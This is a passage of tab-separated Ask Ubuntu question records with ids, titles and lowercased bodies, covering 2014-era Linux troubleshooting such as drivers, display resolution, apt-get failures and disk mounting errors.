1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub [ /code ] thanks for your help @ venki and @ chili555 ! i 've tried ( based on up votes ) both of the methods suggeted here : [ link ] http : //askubuntu.com/questions/55868/installing-broadcom-wireless-drivers [ /link ] to install the propper drivers to no avail . each of the other methods , which seam to take similiar aproaches , but i forgot to bookmark the links : - ( i also edited the original post to include the lspci -nn | grep 0280 and also : lsusb as asked for . the odd thing is that i 've got 7 machines suffing from this of different models , some ( not this one , the wifi would work on the live cd , but not on the install . i 've also done apt-get upgrade-all as well and even tried a fresh install .
475091	ethernet card keeps going to sleep on lubuntu 14.04	i 've `` rescued '' a friends computer from xp with lubuntu . the only problem i 'm having is that every once in awhile i have to unplug/plug back in the ethernet chord because the card just stops working . that 's literally all it takes though . unplug , plug it back in , bam instant connection . what could be causing this ? printout of sudo aplay -l : **** list of playback hardware devices **** home directory not accessible : permission denied card 0 : i82801dbich4 [ intel 82801db-ich4 ] , device 0 : intel ich [ intel 82801db-ich4 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : i82801dbich4 [ intel 82801db-ich4 ] , device 4 : intel ich - iec958 [ intel 82801db-ich4 - iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
475097	can i install ubuntu 14.04 on intel p4 3gb ddr3 ram ?	well like the title say , i have an old computer , with an intel pentium 4 and 3 gb on ram ddr3 , but the cuestion still there , can i install ubuntu 14.04 ? if is true ... how much fast or how much lag i 'll find ?
475104	how do i move an encrypted home folder without using that particular installation .	i 'm attempting to move my encrypted home folder to a back up so i can format that particular partition so i can reinstall another os in its place . problem is , this linux partition which some of my files are in is kind of broken due to some problems with the display server . i 'm running elementary os , which is an ubuntu derivative , so i hope this community can help . thanks !
475108	ubuntu 14.04 lts takes me back to the install screen after installing via usb	basically , i downloaded ubuntu 14.04 ( 64 bit ) , and attempted to install it via my flash drive . i followed the instructions here , but after rebooting when prompted to , i was taken back to the installation screen , asking me to either install ubuntu or just try it . i tried reinstalling ubuntu , since after the first install i booted into windows vista by accident and it did a disk check on where my ubuntu partition was , but the same problem still occurs . also , after the usb installer initially finished , i noticed that the installer mentioned that a few items could not be written for whatever reason ( memory , i believe , but i 'm not completely certain ) . i feel that may be the stem of the problem , but i 'm brand new to linux and pretty much have no clue what i 'm doing , so any help is greatly appreciated .
475113	sudo gedit error	** ( gedit:8315 ) : critical ** : file log.c : line 980 : unexpected error : error calling startservicebyname for org.gnome.zeitgeist.engine : gdbus.error : org.freedesktop.dbus.error.spawn.childexited : process /usr/bin/zeitgeist-daemon exited with status 1 ( g-dbus-error-quark , 25 ) it works alright if i do gksu gedit .
475117	set global / persistent display resolution	i am trying to set resolution to 1024x768 @ 60hz from boot - > login menu - > default desktop settings for user accounts . my system is connected via hdmi to the display , video card details ( from lspci ) : 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv710 [ radeon hd 4350/4550 ] i have a fresh 14.04 install with default display adapter . first , i tried editing grub /etc/default/grub grub_gfxmode=1024x768 without success then , grub_cmdline_linux_default= '' video=1024x768 @ 60 quiet splash '' worked up until the login-screen . i changed the per-user display settings via gui is there a way to set the correct display settings in the bootloader ( or anywhere else ) that will persist as the default ? no other displays are being used , and auto-detect apparently is n't working .
475119	pvr software install on ubuntu 14.04	i have done a fresh install of ubuntu 14.04 and would like to get mythtv or vdr working . i used the ubuntu software centre and synaptic package manager to install the software but i have not been able to start/run or configure either program . i have read and searched and tried many times . it has been quite discouraging . i have been successful with installing and configuring kaffeine to scan dvb-s/s2 but i would like to get mythtv or vdr working as they have more features and hopefully a better scanning capability . i have also tried xbmc installation instructions with no luck . i find it odd that one can install using the ubuntu software centre and synaptic package manager and find that nothing works . there always seems to be permission settings that prevent the successful installation . if we provide a password to start the installation using the ubuntu software centre and synaptic package manager , should n't it just work when the installation is complete ? should n't there be an icon to launch the application ? i 'm not sure if anyone can help me with this as someone will need to invest some time to write a `` current '' installation procedure . any help is appreciated . thanks
475121	bluetooth did not work	the result is as follows when i run lsmod command in terminal : spnaik @ spnaik-vostro-2520 : ~ $ lsmod module size used by ppp_deflate 12806 0 bsd_comp 12785 0 ppp_async 17205 1 crc_ccitt 12627 1 ppp_async nls_utf8 12493 1 isofs 39203 1 option 33967 2 huawei_cdc_ncm 12846 0 cdc_wdm 18509 1 huawei_cdc_ncm cdc_ncm 19695 1 huawei_cdc_ncm usb_wwan 19733 1 option usbserial 38902 7 option , usb_wwan usbnet 37865 2 huawei_cdc_ncm , cdc_ncm nvram 14027 0 rfcomm 53664 0 bnep 18895 2 bluetooth 342263 10 bnep , rfcomm uvcvideo 71309 0 videobuf2_vmalloc 13048 1 uvcvideo videobuf2_memops 13170 1 videobuf2_vmalloc videobuf2_core 39258 1 uvcvideo videodev 108503 2 uvcvideo , videobuf2_core dell_wmi 12665 0 sparse_keymap 13708 1 dell_wmi snd_hda_codec_hdmi 45303 1 snd_hda_codec_cirrus 14287 1 snd_hda_intel 42730 3 snd_hda_codec 164067 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec_cirrus snd_hwdep 13272 1 snd_hda_codec snd_pcm 85501 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel dell_laptop 17808 0 snd_page_alloc 14230 2 snd_pcm , snd_hda_intel dcdbas 14448 1 dell_laptop snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25135 1 snd_seq_midi i915 705396 4 snd_seq 55383 2 snd_seq_midi_event , snd_seq_midi drm_kms_helper 46907 1 i915 intel_rapl 18301 0 x86_pkg_temp_thermal 13845 0 snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi intel_powerclamp 14239 0 coretemp 13195 0 snd_timer 28584 2 snd_pcm , snd_seq crc32_pclmul 12967 0 drm 243792 5 i915 , drm_kms_helper lib80211_crypt_tkip 17456 0 snd 60871 17 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_hda_codec_cirrus , snd_seq_midi wl 3999690 0 joydev 17101 0 mei_me 14099 0 serio_raw 13230 0 lpc_ich 16864 0 lib80211 14040 2 wl , lib80211_crypt_tkip mei 66735 1 mei_me cfg80211 409394 1 wl soundcore 12600 1 snd i2c_algo_bit 13197 1 i915 wmi 18673 1 dell_wmi parport_pc 31981 0 ppdev 17391 0 lp 13299 0 parport 40836 3 lp , ppdev , parport_pc video 18903 1 i915 mac_hid 13037 0 ums_realtek 17733 0 usb_storage 48417 2 ums_realtek hid_generic 12492 0 usbhid 46997 0 hid 87604 2 hid_generic , usbhid ahci 25579 2 libahci 26754 1 ahci psmouse 91033 0 r8169 61562 0 mii 13654 2 r8169 , usbnet spnaik @ spnaik-vostro-2520 : ~ $
475125	bumblebee stopped working after the today 's update	i 've followed this guide to put bumblebee to work . everything was working perfect and i was happy playing my steam games using primusrun to run them . but after today 's update , which updated something related to nvidia , bumblebee is not working anymore : $ primusrun glxgears 2014/06/01 02:36:36 socat [ 4154 ] e connect ( 3 , af=1 `` /var/run/bumblebee.socket '' , 27 ) : no such file or directory primus : fatal : failed to connect to bumblebee daemon : no such file or directory i 'm using ubuntu 14.04 , i have an optimus notebook with a dedicated nvidia geforce 730m and an integrated intel card . could someone help me , please ?
475128	how to use gparted to partion 2 drives as 1	i have a lenovo t43 and a sata extra hd drive instead of the cd drive ; and i have in it a 250 gb hard drive and in my hd caddy i have a 40 gb hard drive . i would like to use gparted to partition these 2 drives as 1 . i would like to have the 250 gb as an extended part of the 40 gb because i already have ubuntu installed on it . they are right now not side by side . i am not sure how to do this , so please list the procedure step by step .
475136	how do i stop gimp from autolaunching on startup ?	gimp launches every time i log into xubuntu ( v. 13.10 ) . gimp is not shown under settings manager- > sessions and startup . it does not appear in ~/.config/autostart . i immediately close gimp in these cases , so it is not running when i shut down the session . how do i stop gimp from autolaunching on startup ? diagnostic info : note that cd / find . -name gimp.desktop only produces ./usr/share/applications/gimp.desktop and nothing else here is the output of grep -lir 'gimp ' ~/ > ~/gimp-search-results.txt sbin/vgimportclone home/joshua/.gimp-2.8/controllerrc home/joshua/.gimp-2.8/tags.xml ... .. [ edited for brevity ] home/joshua/.cache/oneconf/861c4e30b916e750f16fab5652ed5937/package_list_861c4e30b916e750f16fab5652ed5937 home/joshua/.cache/sessions/xfwm4-23e853443-fb4b-42fd-aa61-33fa99fdc12c.state home/joshua/.cache/sessions/xfce4-session-athena:0 home/joshua/.config/abiword/profile
475138	how do i solve `` system is running in low graphics issue '' in ubuntu installer ?	i made a bootable usb for installing ubuntu 12.04 lts alongside windows 8.1 . i inserted my usb device and then booted into it . then it showed me 2 options - 'try ubuntu ' or 'install ubuntu ' . now i press 'try ubuntu ' and then it says , `` the system is running in low graphics mode '' . then i press 'ok ' . then it showed me 4 options . then again i click 'ok ' . then it shows a black screen and nothing happens . i have tried all possible answers provided in au . what should i do ? please help . ps : - i am using windows 8.1 with dedicated graphic card which is amd radeon hd 8670m . i am trying to do this in a dell laptop 3537 inspiron . update : - i tried running the liveusb session with nomodeset on and i was able to enter the installer . but when i run boot-repair ( so that my ubuntu gets detected in the grub menu ) after installing ubuntu successfully alongside windows 8 ( following this tutorial with nomodeset on , i get the following error : - your system is running in legacy mode boot repair done
475142	how to make rdnssd honor dnssl from radvd ?	my radvd.conf have the following lines : ... rdnss 2001:4860:4860 : :8844 2001:4860:4860 : :8888 { } ; dnssl domain.com.br { } ; ... all mac osx ipv6 clients recognizes that option and my domain appear at /etc/resolv.conf file but , it does not appear at my ubuntu desktop ipv6 clients . i have installed the package rdnssd , it detects the rdnss entry like a charm ... so , how to `` tell '' rdnssd to use dnssl too ? ! because it is ignoring it ... : -/ tks ! thiago
475148	error is occured when i try to build and install numeric-24.2 , anybody , help please me	vprasopchai @ vprasopchai-aspire-4720z : ~/downloads/numeric-24.2 $ python setup.py build warning : '' not a valid package name ; please use only.-separated package names in setup.py warning : '' not a valid package name ; please use only.-separated package names in setup.py running build running build_py running build_ext ma version 12.2.0 numeric version 24.2 vprasopchai @ vprasopchai-aspire-4720z : ~/downloads/numeric-24.2 $ python setup.py install warning : '' not a valid package name ; please use only.-separated package names in setup.py warning : '' not a valid package name ; please use only.-separated package names in setup.py running install running build running build_py running build_ext running install_lib creating /usr/local/lib/python2.7/dist-packages/numeric error : could not create '/usr/local/lib/python2.7/dist-packages/numeric ' : permission denied
475152	ubuntu 14.04 change windows dimension	may i change the opening dimensions of applications ? i have tried installing ccsm but there is no more the item `` widows rules '' and i did not found something similar that could help me . thank you
475156	why dropbox does n't work properly anymore ?	for about a week dropbox stopped to work properly on all of my linux computers . there are no dropbox icons in indicator , dropbox folder sometimes shows sync icons , but usually does not . reinstalling dropbox , or even the whole system did n't help . on one of my windows computers folder sync icons are missing too . does anybody have similar problems recently ? did someone work this around ?
475158	gdbus send array of bytes	i am trying to send array of bytes from client to server using gdbus . i could n't send entire array of bytes . i want to send follwing string `` karthick hai \0 \0 raja how r u \0 i am good\0 '' if i use byte string , its sending till `` karthick hai '' i found that `` ay '' is the option . but for loop we need to write byte one bye one i guess . i do n't want that one . performance will be affected since number of bytes will be more in my case . please help me to send entire bytes . thanks kathick .
475161	bluetooth dongle not paring	my audio speaker is detected by the bluetooth dongle ( brand integral ) but it fail to pair . note , it 's ok with another usb dongle brand . the dongle is delivered with windows drivers cd , can i install it on ubuntu ? ubuntu 14.04
475162	touchpad not working dell latitude e5420	after installing ubuntu 14.04 on dell latitude e5420 ( i have windows 7 ultimate also installed ) the mouse touchpad does not work . i am very new to linux and ubuntu . can someone help with easy step-by-step guide to fix this please . thanks .
475163	unable to install 14.04 server in hp proliant dl580 g7	had any one installed ubutu 14.04 lts server in hp proliant dl580 g7 server
475166	mtp wo n't work with newer ubuntu	i have a philips gogear vibe 4 gb , set to mtp mode , as it 's always been . this works fine with older versions of ubuntu and works fine with windows , but does n't work with newer versions of ubuntu . the version history is like this : 12.04 - works 12.10 - works 13.04 - does n't work 14.04 - does n't work windows 7 - works when you plug the mp3 player in ubuntu the file manager opens the root of the device , which contains the folder `` internal storage '' . when you click on `` internal storage '' to open it , the file manager just hangs . and if you try to unmount the mp3 player , that process hangs too , until you just unplug it . in windows when you click on internal storage , it opens and shows all the files it contains . and in the earlier versions of ubuntu it just worked . any ideas ? thanks .
475168	postfix / dovecot / mysql- does n't work !	i have just installed a mail- server on postfix and dovecot using mysql to authenticate the user . but if i try to conntect to the server via outlook or thunderbird , the following error appears in the mail.err : postfix/smtpd [ 4937 ] : fatal : no sasl authentication mechanisms any idea how to fix this ? thx : )
475169	driver for asus wireless pc card wl-100ge	i have bought an asus wireless lan pc card wl-100ge model , and i am using lubuntu on my system . while i have no cable connection , currently i can not access the internet and update my laptop . device : broad range wireless card bus adaptor - asus - wl-100ge i searched the web and could n't find any adequate driver for it . is there any solution for it ? my sudo lshw -c network output is : *-network description : ethernet interface product : rtl-8100/8101l/8139 pci fast ethernet adapter vendor : realtek semiconductor co. , ltd. physical id : 3 bus info : pci @ 0000:02:03.0 logical name : eth0 version : 10 serial : 00:02:3f : ba:55 : c8 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=half latency=128 link=no maxlatency=64 mingnt=32 multicast=yes port=mii speed=10mbit/s resources : irq:19 ioport:3000 ( size=256 ) memory : e0200800-e02008ff *-network description : network controller product : bcm4318 [ airforce one 54g ] 802.11g wireless lan controller vendor : broadcom corporation physical id : 1 bus info : pci @ 0000:07:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : bus_master configuration : driver=b43-pci-bridge latency=64 resources : irq:21 memory:38000000-38001fff -- -- : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions .
475173	how to show how-much data is needed to download while apt-get ?	i want to know how-much data is needed to download any package by apt without installing that package . in other words if i run apt-get install xyz then it will download and install packages with their dependencies . but i want to know/show only how-much ( total ) data ( ex : need to get 73mb of archives ) to download without downloading and installing that package ( s ) .
475174	random burst of cpu act . in 14.04	on an hp 6730s ( e ) [ 32-bit ] both cores of my cpu jumped to 100 % , fans went up to full ... in a post for one of the previous versions ... they had the same problem ... how do i mount the hard drive ? and fix vgswap ? ( how do i fix this ) -ubuntu noob
475187	ubuntu 14.04 freezes randomly	i have installed ubuntu 14.04 version along side with windows 7 . ubuntu freezes randomly i am unable to use any keys on keyboard since they are not working even mouse is not working.the only solution to get off from this freeze is restarting my computer.i have ati/amd graphic card but i removed it before installing ubuntu 14.04.i have run memory test no problem with ram.please give some solution to get rid of this abnormal freeze . thanks in advance . system configuration cpu=intel core 2 duo e7500 2.93ghz motherboard=intel dg41wv hard disk=seagate 500gb ram=4gb i dual booted windows 7 and 12.04 lts version.in 12.04 i am getting freezes frequently so reinstalled by formatting whole computer and installing windows 7 and ubuntu 12.04 but still freezes are frequently occurring.then i formatted whole system again installed windows 7 and ubuntu 14.04 still i am getting random freezes..i am using gcc compiler , vim editor and firefox no other applications
475189	how to add the town name to the conky harmattan configuration ?	the conky configuration harmattan displays information about the current state of the weather but it does not display the name of the city that the weather refers to . how can i add the name of the city as well ?
475195	how to use xvfb in ubuntu 14.04 with/without randr ?	i try to run unit-tests with selenium running firefox on my ubuntu 14.04 server . and i 'm using xvfb as described in this blog to simulate a virtual display to show firefox in . but xvfg somehow does n't load/work with randr . because whenever i try this : sudo xvfb :10 -ac & export display=:10 firefox i get an xlib : extension `` randr '' missing on display `` :10 '' -error . i 've also tried sudo xvfb :10 -ac +extension randr , sudo xvfb :10 -ac -extension randr and beacuse it supplies with `` xrandr '' also apt-get install x11-xserver-utils . and my setup is a plain empty ubuntu 14.04 server with apt-get install xvfb firefox . can anyone please help me run xvfb with or without randr ?
475196	unable to mount external hard drive - damaged file system and mft	i get the following error when i try to mount my external hard drive . unable to mount error mounting /dev/sdc1 at /media/khalibloo/khalibloo2 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdc1 '' `` /media/khalibloo/khalibloo2 '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read of mft , mft=6 count=1 br=-1 : input/output error failed to open inode file_bitmap : input/output error failed to mount '/dev/sdc1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then frst activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . it does n't mount on windows either : i/o device error it 's an ntfs hard drive with a single partition of course , i tried chkdsk /f , it reported several file segments as unreadable , but did n't say whether it fixed them or not ( apparently not ) . also tried with the /b flag . ntfsfix reported the volume as corrupt . testdisk was able to fix a small error with the partition table by adding the `` 80 '' flag for the active ( only ) partition . testdisk also confirmed that the boot sector was fine and it matched the backup . however , when attempting to repair the mft , it could n't read the mft . it also could n't list the files on the hard drive . it says file system may be damaged . active @ also shows that mft is missing or corrupt . i tried replacing the usb cable . did n't change anything . i tried to update the driver . windows reported that it was already up to date . yes , the driver was enabled . so how do i fix the file system ? or the mft ? or the i/o device error ? update : i noticed that with each try , chkdsk /f goes a bit further , so i kept trying until i got to a point where it says insufficient disk space to hotfix unreadable system file 4 since i ca n't access the files on the drive , there 's no way to free up any space . so i thought that perhaps i could format the drive partially to free up some space , and retry chkdsk /f . do you think that could work ? or will it just cause more problems to interrupt a format process ?
475198	ls system command not showing terminal colors	i 've just been fooling around with some code in c , an example of a really basic program is as follows which just , obviously , lists the directories using the ls system command . # include < stdio.h > int main ( void ) { system ( `` ls -l -d */ '' ) ; printf ( `` i 've just listed the directories : - ) \n '' ) ; return 0 ; } this runs fine , but it shows the ls output in monochrome , whereas bash would output the list using colors for the directories ( or files if i included files ) . how can i make my c code use the bash colors ? thanks
475203	cmake fails while configuring opencv	i 'm trying to buid opencv and use it in qt . i have installed all required packages for opencv and qt , after that i tried too run cmake -d cmake_build_type=release -d cmake_install_prefix=/usr/local /media/d/install/opencv-2.4.8 but i got errors : cmake error at /usr/share/cmake-2.8/modules/cmakedeterminesystem.cmake:189 ( configure_file ) : configure_file problem configuring file call stack ( most recent call first ) : cmakelists.txt:56 ( project ) -- the cxx compiler identification is gnu 4.8.2 cmake error at /usr/share/cmake-2.8/modules/cmakedeterminecxxcompiler.cmake:185 ( configure_file ) : configure_file problem configuring file call stack ( most recent call first ) : cmakelists.txt:56 ( project ) -- the c compiler identification is gnu 4.8.2 cmake error at /usr/share/cmake-2.8/modules/cmakedetermineccompiler.cmake:186 ( configure_file ) : configure_file problem configuring file call stack ( most recent call first ) : cmakelists.txt:56 ( project ) -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - failed cmake error at /usr/share/cmake-2.8/modules/cmaketestcxxcompiler.cmake:71 ( configure_file ) : configure_file problem configuring file call stack ( most recent call first ) : cmakelists.txt:56 ( project ) -- check for working c compiler : /usr/bin/cc -- check for working c compiler : /usr/bin/cc -- works -- detecting c compiler abi info -- detecting c compiler abi info - failed cmake error at /usr/share/cmake-2.8/modules/cmaketestccompiler.cmake:78 ( configure_file ) : configure_file problem configuring file call stack ( most recent call first ) : cmakelists.txt:56 ( project ) cmake error at cmakelists.txt:70 ( message ) : cmake fails to deterimine the bitness of target platform . please check your cmake and compiler installation . if you are crosscompiling then ensure that your cmake toolchain file correctly sets the compiler details . -- configuring incomplete , errors occurred ! cmakelists.txt:56 : project ( opencv cxx c ) /usr/share/cmake-2.8/modules/cmakedeterminesystem.cmake:189 : configure_file ( $ { cmake_root } /modules/cmakesystem.cmake.in $ { cmake_platform_info_dir } /cmakesystem.cmake immediate @ only )
475206	xubuntu 14.04 display window when charger is plugged/unplugged	i have an acer aspire v3-551g laptop with xubuntu 14.04 x64 . everything is great , but when i plug the laptop in , or unplug it , i get a window showing menus and stuff would be seen in settings > display - like this : it 's not a major issue , but it 's annoying . any way it can be fixed ? it 's not an installation issue - i had it with a previous installation as well . laptop specs : amd a8-4500m x4 @ 1.9 ghz amd radeon 7670m ( dedicated ) + 7640g ( integrated ) graphics 8 gb ram
475209	weird java memory allocation	my task manager shows that for my java process memory allocated is 16777216.0 tb ( yep , tb ) . it happens when programming swing application with eclipse 3.8 . oh , and my distro is lubuntu 14.04 . nothing special about it , just regular install . running eclipse with -xmx512 does n't help , really . any ideas because i do n't even know where to start looking .
475212	ca n't run apt-get update	i 'm trying to run apt-get update but there 's an error i do n't understand . this is the output with the error : err http : //security.ubuntu.com oneiric-security/main sources 404 not found [ ip : 91.189.88.153 80 ] err http : //security.ubuntu.com oneiric-security/universe sources 404 not found [ ip : 91.189.88.153 80 ] err http : //security.ubuntu.com oneiric-security/main amd64 packages 404 not found [ ip : 91.189.88.153 80 ] err http : //security.ubuntu.com oneiric-security/universe amd64 packages 404 not found [ ip : 91.189.88.153 80 ] err http : //security.ubuntu.com oneiric-security/main i386 packages 404 not found [ ip : 91.189.88.153 80 ] err http : //security.ubuntu.com oneiric-security/universe i386 packages 404 not found [ ip : 91.189.88.153 80 ] ign http : //security.ubuntu.com oneiric-security/main translation-en_us ign http : //security.ubuntu.com oneiric-security/main translation-en ign http : //security.ubuntu.com oneiric-security/universe translation-en_us ign http : //security.ubuntu.com oneiric-security/universe translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/main/source/sources 404 not found [ ip : 91.189.88.153 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/universe/source/sources 404 not found [ ip : 91.189.88.153 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/main/binary-amd64/packages 404 not found [ ip : 91.189.88.153 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/universe/binary-amd64/packages 404 not found [ ip : 91.189.88.153 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/main/binary-i386/packages 404 not found [ ip : 91.189.88.153 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/universe/binary-i386/packages 404 not found [ ip : 91.189.88.153 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . subsequently , the package i 'm trying to install is failing these errors : $ sudo apt-get install php-pear the following new packages will be installed : autoconf automake autotools-dev libltdl-dev libltdl7 libtool php-pear php5-dev shtool the following packages will be upgraded : libapache2-mod-php5 php5-cli php5-common php5-curl php5-gd php5-mysql 6 upgraded , 9 newly installed , 0 to remove and 141 not upgraded . need to get 9,223 kb/9,372 kb of archives . after this operation , 13.5 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main autoconf all 2.68-1ubuntu1 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main autotools-dev all 20110511.1 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main automake all 1:1.11.1-1ubuntu1 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main php5-cli amd64 5.3.6-13ubuntu3.10 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main php5-mysql amd64 5.3.6-13ubuntu3.10 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main php5-curl amd64 5.3.6-13ubuntu3.10 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main php5-gd amd64 5.3.6-13ubuntu3.10 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main libapache2-mod-php5 amd64 5.3.6-13ubuntu3.10 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main php5-common amd64 5.3.6-13ubuntu3.10 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main libltdl7 amd64 2.4-2ubuntu1 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main libltdl-dev amd64 2.4-2ubuntu1 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main libtool amd64 2.4-2ubuntu1 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main php-pear all 5.3.6-13ubuntu3.10 403 forbidden err http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main php5-dev amd64 5.3.6-13ubuntu3.10 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/a/autoconf/autoconf_2.68-1ubuntu1_all.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/a/autotools-dev/autotools-dev_20110511.1_all.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/a/automake1.11/automake_1.11.1-1ubuntu1_all.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.3.6-13ubuntu3.10_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.3.6-13ubuntu3.10_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.3.6-13ubuntu3.10_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.3.6-13ubuntu3.10_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.3.6-13ubuntu3.10_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.3.6-13ubuntu3.10_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/libt/libtool/libltdl7_2.4-2ubuntu1_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/libt/libtool/libltdl-dev_2.4-2ubuntu1_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/libt/libtool/libtool_2.4-2ubuntu1_amd64.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.3.6-13ubuntu3.10_all.deb 403 forbidden failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.3.6-13ubuntu3.10_amd64.deb 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
475216	ca n't upgrade to trusty	i try this to upgrade but just get an error : nick @ netbook : ~ $ sudo update-manager checking for a new ubuntu release warning : root : file 'trusty.tar.gz.gpg ' missing nick @ netbook : ~ $ the gui just says : failed to fetch fetching the upgrade failed . there may be a network problem . there is not a network problem , all other network stuff works and this has been happening for weeks . any idea of what actions i should take to sort this ? cheers nick
475217	low display resolution in ubuntu 14.04	recently i installed ubuntu 14.04 , but its graphics/display resolution is too low . i am getting only 2 options in my appearance setting , i.e . 1024x786 ( 4:3 ) and 800x600 , with unknown display option . how can i fix this issue and get a better display resolution ? 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 )
475224	boot fail after update xubuntu 12.04	updated my system manually with apt-get dist-upgrade . after reboot system gets stuck on black loading screen with text xubuntu 12.04 and white dots under it . tried to boot with older kernels but results remained the same . booted into recovery mode . i can connect to network and mount all partitions . tried startx command which loaded default desktop . if i try `` resume normal boot '' option it says : initctl : event failed which suggests a problem with video driver , but it was not updated . this error does not occur when simply booting , then it 's just stuck on loading screen . pulled the update log : contents of /var/log/apt/history.log start-date : 2014-06-01 10:39:16 commandline : aptdaemon role='role-upgrade-system ' sender=':1.47' upgrade : libcupsppdc1 : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , libcupsimage2 : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , libcupscgi1 : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , libcupsdriver1 : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , cups-client : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , cups-ppdc : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , cups-common : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , libcups2 : amd64 ( 1.5.3-0ubuntu8.2 , 1.5.3-0ubuntu8.3 ) , libcups2 